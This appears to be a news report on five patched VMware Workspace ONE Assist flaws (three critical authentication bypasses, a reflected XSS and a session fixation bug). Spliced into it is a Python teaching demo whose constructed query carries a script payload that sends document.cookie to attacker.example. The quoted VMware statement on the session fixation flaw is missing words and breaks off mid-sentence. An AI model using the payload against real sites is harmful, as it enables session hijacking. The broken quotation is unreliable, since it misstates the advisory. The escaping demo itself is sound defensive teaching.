VMware has patched five security flaws affecting its Workspace ONE Assist remote-support solution, some of which could be abused to bypass authentication and gain elevated permissions.
Topping the list are three critical vulnerabilities tracked as CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687. All three are rated 9.8 on the CVSS vulnerability scoring system.
CVE-2022-31685 is an authentication bypass flaw that can be exploited by an attacker with network access to VMware Workspace ONE Assist to gain administrative access to the application without requiring authentication.
The virtualization software vendor describes CVE-2022-31686 as a "broken authentication method" vulnerability and CVE-2022-31687 as a "broken access control" vulnerability.
"A malicious actor with network access could gain administrative access without requiring authentication to the application," VMware said in its advisories for CVE-2022-31686 and CVE-2022-31687.
Also patched is a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31688, CVSS score: 6.4) that stems from improper sanitization of user input and can be exploited to inject arbitrary JavaScript code into the target user's browser window.
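To illustrate the bug class behind CVE-2022-31688, here is an added example (not VMware's code, and not derived from the Workspace ONE Assist advisory) showing a hypothetical greeting endpoint that reflects a query parameter into HTML verbatim, next to the same endpoint with context-aware output encoding. The query string, parameter name and page template are constructed for the demonstration.

```python
import html
from urllib.parse import parse_qs

# Constructed request for the demo: the "name" parameter is attacker-controlled
# and, once URL-decoded, carries a script tag that exfiltrates document.cookie.
CONSTRUCTED_QUERY = (
    "name=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F"
    "%3F%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def greeting_vulnerable(query: str) -> str:
    """Hypothetical vulnerable handler: reflects the parameter without encoding.

    This is the 'improper sanitization of user input' pattern. Whatever the
    victim's browser sends in ?name= is placed straight into the HTML body,
    so markup in the parameter is parsed as markup, not text.
    """
    name = parse_qs(query).get("name", [""])[0]
    return f"<html><body><h1>Hello, {name}</h1></body></html>"


def greeting_fixed(query: str) -> str:
    """Hardened handler: encode for the HTML text-node context before reflecting.

    html.escape() converts <, >, &, " and ' into entities, so the browser
    renders the payload as literal text instead of executing it.
    """
    name = parse_qs(query).get("name", [""])[0]
    safe_name = html.escape(name, quote=True)
    return f"<html><body><h1>Hello, {safe_name}</h1></body></html>"


def contains_live_script(page: str) -> bool:
    """Crude check used by the demo: is there an unencoded <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", greeting_vulnerable(CONSTRUCTED_QUERY))
    print("fixed:     ", greeting_fixed(CONSTRUCTED_QUERY))
```

The fix is output encoding chosen for the context the data lands in (an HTML text node here); the same value would need different encoding inside an attribute, a URL or a script block, so escaping once at input time is not a substitute.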
Rounding out the patch is a session fixation vulnerability (CVE-2022-31689, CVSS score: 4.2) that is the result of improper handling of session tokens, VMware said, stating that "a malicious actor who has obtained a valid may be able to authenticate the application using
Dutch security researchers Jasper Westerman, Jan van der Put, Yanick de Pater, and Harm Blankers of Reqon are credited with discovering and reporting the flaws.
All five issues affect VMware Workspace ONE Assist versions 21.x and 22.x and are fixed in version 22.10. The company also said there are no workarounds to address the weaknesses.